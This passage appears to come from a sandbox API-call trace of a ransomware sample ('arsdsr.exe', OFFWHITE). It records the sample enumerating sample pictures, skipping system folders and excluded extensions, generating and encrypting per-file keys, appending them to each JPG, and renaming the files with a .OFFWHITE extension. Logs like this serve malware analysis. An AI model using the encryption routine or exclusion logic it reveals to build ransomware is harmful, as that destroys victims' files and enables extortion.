lpString2="...") returned 1 [0153.728] lstrcmpiW (lpString1="Sample Pictures", lpString2="windows") returned -1 [0153.728] lstrcmpiW (lpString1="Sample Pictures", lpString2="$recycle.bin") returned 1 [0153.728] lstrcmpiW (lpString1="Sample Pictures", lpString2="rsa") returned 1 [0153.728] lstrcmpiW (lpString1="Sample Pictures", lpString2="ntuser.dat") returned 1 [0153.728] lstrcmpiW (lpString1="Sample Pictures", lpString2="programdata") returned 1 [0153.728] lstrcmpiW (lpString1="Sample Pictures", lpString2="appdata") returned 1 [0153.728] lstrcmpiW (lpString1="Sample Pictures", lpString2="program files") returned 1 [0153.728] lstrcmpiW (lpString1="Sample Pictures", lpString2="program files (x86)") returned 1 [0153.728] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Pictures\\" | out: lpString1="C:/Users\\Public\\Pictures\\") returned="C:/Users\\Public\\Pictures\\" [0153.728] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\", lpString2="Sample Pictures" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures") returned="C:/Users\\Public\\Pictures\\Sample Pictures" [0153.728] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures", lpString2="\\" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\" [0153.728] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\" [0153.728] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\*.*") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\*.*" [0153.728] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0153.730] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.730] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0153.730] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.730] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.730] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0153.730] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2=".") returned 1 [0153.730] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="..") returned 1 [0153.730] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="...") returned 1 [0153.730] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="windows") returned -1 [0153.730] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="$recycle.bin") returned 1 [0153.731] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="rsa") returned -1 [0153.731] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="ntuser.dat") returned -1 [0153.731] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="programdata") returned -1 [0153.731] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="appdata") returned 1 [0153.731] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="program files") returned -1 [0153.731] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="program files (x86)") returned -1 [0153.731] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\" [0153.731] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Chrysanthemum.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" [0153.731] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.731] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.731] PathFindExtensionW (pszPath="Chrysanthemum.jpg") returned=".jpg" [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0153.731] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0153.731] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0153.731] GetProcessHeap () returned 0x500000 [0153.731] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543eb8 [0153.732] CreateFileW (lpFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0153.733] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=879394) returned 1 [0153.733] GetProcessHeap () returned 0x500000 [0153.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0153.733] GetProcessHeap () returned 0x500000 [0153.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0153.733] GetProcessHeap () returned 0x500000 [0153.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5662b0 [0153.733] GetProcessHeap () returned 0x500000 [0153.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0153.733] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.733] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.733] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0153.733] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.733] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.733] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0153.733] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.733] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.733] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0153.733] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.733] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.733] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0153.734] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd6b22, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.734] SetLastError (dwErrCode=0x0) [0153.734] WriteFile (in: hFile=0x21c, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0153.736] GetLastError () returned 0x0 [0153.736] GetLastError () returned 0x0 [0153.736] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd6c22, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.736] WriteFile (in: hFile=0x21c, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0153.736] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd6d22, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.736] WriteFile (in: hFile=0x21c, lpBuffer=0x543eb8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x543eb8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0153.736] GetProcessHeap () returned 0x500000 [0153.736] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xd6b22) returned 0x2a60020 [0153.736] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.737] ReadFile (in: hFile=0x21c, lpBuffer=0x2a60020, nNumberOfBytesToRead=0xd6b22, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295dec0*=0xd6b22, lpOverlapped=0x0) returned 1 [0153.833] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.833] WriteFile (in: hFile=0x21c, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0xd6b22, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295decc*=0xd6b22, lpOverlapped=0x0) returned 1 [0153.835] GetProcessHeap () returned 0x500000 [0153.835] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0153.840] CloseHandle (hObject=0x21c) returned 1 [0153.840] GetProcessHeap () returned 0x500000 [0153.840] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0153.840] GetProcessHeap () returned 0x500000 [0153.840] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0153.840] GetProcessHeap () returned 0x500000 [0153.840] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0153.840] GetProcessHeap () returned 0x500000 [0153.840] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0153.840] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" [0153.840] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.OFFWHITE") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.OFFWHITE" [0153.840] MoveFileW (lpExistingFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.OFFWHITE" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.offwhite")) returned 1 [0153.841] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="Desert.jpg", cAlternateFileName="")) returned 1 [0153.841] lstrcmpiW (lpString1="Desert.jpg", lpString2=".") returned 1 [0153.841] lstrcmpiW (lpString1="Desert.jpg", lpString2="..") returned 1 [0153.841] lstrcmpiW (lpString1="Desert.jpg", lpString2="...") returned 1 [0153.841] lstrcmpiW (lpString1="Desert.jpg", lpString2="windows") returned -1 [0153.841] lstrcmpiW (lpString1="Desert.jpg", lpString2="$recycle.bin") returned 1 [0153.841] lstrcmpiW (lpString1="Desert.jpg", lpString2="rsa") returned -1 [0153.841] lstrcmpiW (lpString1="Desert.jpg", lpString2="ntuser.dat") returned -1 [0153.841] lstrcmpiW (lpString1="Desert.jpg", lpString2="programdata") returned -1 [0153.842] lstrcmpiW (lpString1="Desert.jpg", lpString2="appdata") returned 1 [0153.842] lstrcmpiW (lpString1="Desert.jpg", lpString2="program files") returned -1 [0153.842] lstrcmpiW (lpString1="Desert.jpg", lpString2="program files (x86)") returned -1 [0153.842] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\" [0153.842] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Desert.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" [0153.842] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.842] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.842] PathFindExtensionW (pszPath="Desert.jpg") returned=".jpg" [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0153.842] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0153.842] lstrcmpiW (lpString1="Desert.jpg", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0153.842] GetProcessHeap () returned 0x500000 [0153.842] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543ec8 [0153.842] CreateFileW (lpFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0153.843] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=845941) returned 1 [0153.843] GetProcessHeap () returned 0x500000 [0153.843] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0153.843] GetProcessHeap () returned 0x500000 [0153.843] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0153.843] GetProcessHeap () returned 0x500000 [0153.843] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0153.843] GetProcessHeap () returned 0x500000 [0153.843] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5662b0 [0153.843] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.843] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.843] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0153.843] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.843] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.843] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0153.843] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.843] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.843] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0153.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.844] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0153.844] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xce875, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.844] SetLastError (dwErrCode=0x0) [0153.844] WriteFile (in: hFile=0x21c, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0153.846] GetLastError () returned 0x0 [0153.846] GetLastError () returned 0x0 [0153.846] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xce975, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.846] WriteFile (in: hFile=0x21c, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0153.846] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xcea75, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.846] WriteFile (in: hFile=0x21c, lpBuffer=0x543ec8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x543ec8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0153.846] GetProcessHeap () returned 0x500000 [0153.846] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xce875) returned 0x2a60020 [0153.847] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.847] ReadFile (in: hFile=0x21c, lpBuffer=0x2a60020, nNumberOfBytesToRead=0xce875, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295dec0*=0xce875, lpOverlapped=0x0) returned 1 [0154.001] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.001] WriteFile (in: hFile=0x21c, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0xce875, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295decc*=0xce875, lpOverlapped=0x0) returned 1 [0154.004] GetProcessHeap () returned 0x500000 [0154.004] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0154.009] CloseHandle (hObject=0x21c) returned 1 [0154.009] GetProcessHeap () returned 0x500000 [0154.010] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0154.010] GetProcessHeap () returned 0x500000 [0154.010] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0154.010] GetProcessHeap () returned 0x500000 [0154.010] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0154.010] GetProcessHeap () returned 0x500000 [0154.010] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0154.010] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" [0154.010] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.OFFWHITE") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.OFFWHITE" [0154.010] MoveFileW (lpExistingFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.OFFWHITE" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.offwhite")) returned 1 [0154.011] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0154.011] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0154.011] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0154.011] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0154.011] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0154.011] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0154.011] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0154.012] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0154.012] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0154.012] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0154.012] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0154.012] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0154.012] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\" [0154.012] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" [0154.012] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.012] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.012] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0154.012] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0154.012] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0154.012] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0154.012] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0154.012] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0154.012] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0154.012] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0154.012] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="Hydrangeas.jpg", cAlternateFileName="HYDRAN~1.JPG")) returned 1 [0154.012] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".") returned 1 [0154.012] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="..") returned 1 [0154.012] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="...") returned 1 [0154.012] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="windows") returned -1 [0154.012] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="$recycle.bin") returned 1 [0154.012] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="rsa") returned -1 [0154.012] 